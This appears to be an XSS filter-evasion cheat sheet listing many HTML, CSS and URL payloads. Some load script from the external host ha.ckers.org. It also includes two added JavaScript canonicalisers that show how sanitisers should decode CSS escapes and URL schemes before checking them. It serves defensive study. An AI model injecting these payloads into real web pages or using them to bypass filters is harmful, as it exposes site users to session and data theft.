1. Vary the letter case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

A regex such as <script[^>]*> stops at the first ">" inside the attribute value, but the tag parser still sees a SCRIPT element with a SRC attribute.

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use an extension other than .js

The browser runs whatever the response body is as script; the extension in the URL does not matter.

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:
body {
    background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters inside the script tag

A "/" is accepted as a separator between the tag name and its attributes, so a filter that expects a space after "script" never matches.

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or newline to evade

The embedded tab and newline were collapsed to spaces when this post was rendered; the gaps mark where they sit. Browsers drop tab, LF and CR from a URL before reading its scheme, so the value still resolves to javascript:.

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">   -> tab

<IMG SRC="jav ascript:alert('XSS');">   -> new line
7. Use "\" (CSS backslash escapes) to evade

The CSS parser removes backslash escapes and /* */ comments before it matches an identifier, so the raw text never contains "expression" or "@import". expression() is a legacy IE-only feature.

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
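Sections 4 and 7 work because the CSS tokenizer decodes backslash escapes and discards /* */ comments before it matches an identifier, while a regex filter only sees the raw text. The following is an added example (my code, not from the original post or from ha.ckers.org): a small canonicaliser that applies those two tokenizer rules, string-aware so the "*//*" inside the quoted string of the last section-7 payload is not treated as a comment, and a check run on the canonical form instead of the raw form. The payload list, function names and constant names are mine; the hex-escape payload is constructed.

```javascript
// Added example: canonicalise CSS the way its tokenizer does before inspecting it.
// Not from the original post; payloads are the page's section 4/7 vectors plus one constructed case.

// What a regex filter on the raw style text typically looks for.
function naiveStyleBlocks(css) {
  return /expression\s*\(|javascript:|@import/i.test(css);
}

// Apply the CSS tokenizer rules that matter here:
//   \ + 1-6 hex digits (+ one optional whitespace)  -> that code point
//   \ + any other character                         -> that character
//   /* ... */ outside a string                      -> dropped
// Escapes are decoded both inside and outside strings; comment delimiters
// inside a string are ordinary characters.
function canonicalizeCss(css) {
  let out = '';
  let quote = null; // delimiter of the string we are inside, or null
  for (let i = 0; i < css.length; ) {
    const c = css[i];
    if (quote === null && c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 2;
      continue;
    }
    if (c === '\\') {
      const m = /^([0-9a-f]{1,6})[ \t\n\r\f]?|^([\s\S])/i.exec(css.slice(i + 1));
      if (m) {
        if (m[1] !== undefined) {
          const cp = parseInt(m[1], 16);
          out += cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
        } else {
          out += m[2];
        }
        i += 1 + m[0].length;
        continue;
      }
    }
    if (quote === null && (c === '"' || c === "'")) quote = c;
    else if (c === quote) quote = null;
    out += c;
    i += 1;
  }
  return out;
}

// The same check, run on the canonical form. For untrusted HTML the better rule
// is to drop style attributes and <style> elements altogether; this shows why an
// in-place filter must at least canonicalise first.
function cssLooksDangerous(css) {
  const canon = canonicalizeCss(css).toLowerCase();
  return /expression\s*\(|javascript\s*:|@import/.test(canon);
}

// Constructed payload list (names and the hex-escape case are mine).
const STYLE_PAYLOADS = [
  'width: expre\\ssi\\on(alert(1));',                             // section 7: escaped letters
  'xss:expr/*anyword*/ession(alert(1))',                          // section 7: comment inside the identifier
  "@im\\port'\\ja\\vasc\\ript:alert(1)';",                        // section 7: escaped @import and scheme
  'no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert(1))',  // section 7: "*//*" is string content, not a comment
  'width: \\65 xpression(alert(1))',                              // constructed: hex escape plus the consumed space
  "background-image: url('javascript:alert(1)')",                 // section 4: javascript: inside url()
  'background-image: url(https://example.com/bg.png)',            // benign
];

function evaluateStyles(payloads = STYLE_PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    naiveBlocked: naiveStyleBlocks(p),
    canonical: canonicalizeCss(p),
    dangerous: cssLooksDangerous(p),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of evaluateStyles()) {
    console.log(`${r.dangerous ? 'DANGER' : 'ok    '}  naive=${r.naiveBlocked ? 'blocked' : 'missed '}  ${JSON.stringify(r.canonical)}`);
  }
}
```

Run it with node: the raw-text regex blocks only the plain url('javascript:...') case and misses the other five, while the canonical form exposes "expression(", "@import" and "javascript:" in every one of them and leaves the benign background image alone.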
8. Use hex encoding to evade (the trailing ";" can also be dropped)

The encoded forms are HTML numeric character references (e.g. &#x6A; for "j"); browsers also accept them without the closing ";". The encoded originals were decoded when this post was rendered, so the "source" lines below now read the same as the rendered ones.

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in HTML tag event handlers

<body onload="alert('onload')">

Any of these handler attributes can carry the script: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside a SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and let the browser reassemble it (IE XML data islands with DATASRC/DATAFLD binding)

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME (IE behaviors)

The script tag inside the to= value is entity-encoded so that it survives attribute parsing and is decoded only when HTML+TIME assigns it to innerHTML.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>
13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
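The javascript: sinks above, combined with the case changes of section 1, the embedded tab/newline of section 6 and the character references of section 8, all defeat a filter that greps the raw attribute value. The following is an added example (my code, not from the original post or from ha.ckers.org) that canonicalises a URL attribute value the way the HTML attribute tokenizer and the URL parser will before it looks at the scheme, and then applies an allowlist of schemes instead of a blacklist of strings. The payload list is constructed for the demo; function and constant names are mine.

```javascript
// Added example: canonicalise a URL attribute value before checking its scheme.
// Not from the original post; the payloads below are constructed for the demo.

// The kind of check the techniques on this page are written to slip past.
function naiveBlacklistBlocks(value) {
  return /<script>|javascript:/.test(value);
}

// Decode HTML character references as the attribute-value tokenizer does:
// decimal (&#106), hex (&#x6A / &#X6A), with the trailing ';' optional.
// Single pass, so a decoded '&' is never re-decoded. Named references are
// reduced to the handful that matter here (a real implementation uses the
// full HTML5 entity table).
const NAMED_REFS = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", Tab: '\t', NewLine: '\n' };
function codePoint(n) {
  return n === 0 || n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n);
}
function decodeCharRefs(value) {
  return value.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([A-Za-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined) return codePoint(parseInt(hex, 16));
    if (dec !== undefined) return codePoint(parseInt(dec, 10));
    return Object.prototype.hasOwnProperty.call(NAMED_REFS, name) ? NAMED_REFS[name] : m;
  });
}

// The URL parser strips leading/trailing C0 controls and spaces and removes
// tab, LF and CR anywhere in the input, so "jav\tascript:" is "javascript:".
// Returns the lower-cased scheme, or null when the value has no scheme.
function canonicalScheme(value) {
  const decoded = decodeCharRefs(value);
  const stripped = decoded
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist: accept relative URLs and a short list of known-safe schemes;
// everything else (javascript:, vbscript:, data:, ...) is rejected.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);
function urlIsSafe(value) {
  const scheme = canonicalScheme(value);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// Constructed payloads: the first eight must be rejected, the last two allowed.
const URL_PAYLOADS = [
  'javascript:alert(1)',
  'JaVaScRiPt:alert(1)',                                                    // section 1: letter case
  'jav\tascript:alert(1)',                                                  // section 6: embedded tab
  'jav\nascript:alert(1)',                                                  // section 6: embedded newline
  'jav&#x09;ascript:alert(1)',                                              // section 6 via a hex reference
  '&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert(1)',               // section 8: decimal refs, no ';'
  '&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)', // section 8: hex refs
  ' \x01javascript:alert(1)',                                               // leading space and control char
  'https://example.com/?q=javascript:alert(1)',                             // benign: the scheme is https
  '/images/logo.png',                                                       // benign: relative URL
];

function evaluateUrls(payloads = URL_PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    naiveBlocked: naiveBlacklistBlocks(p),
    scheme: canonicalScheme(p),
    allowed: urlIsSafe(p),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of evaluateUrls()) {
    console.log(`${r.allowed ? 'ALLOW' : 'DENY '}  naive=${r.naiveBlocked ? 'blocked' : 'missed '}  scheme=${r.scheme}  ${JSON.stringify(r.payload)}`);
  }
}
```

Run it with node: the naive check misses the case-changed, whitespace-split and character-reference forms and, worse, blocks the benign https URL because the string happens to appear in its query. The allowlist rejects all eight obfuscated forms and passes both benign values. For untrusted HTML the companion rule is to drop every on* handler (section 9) and the style attribute outright rather than trying to filter their contents.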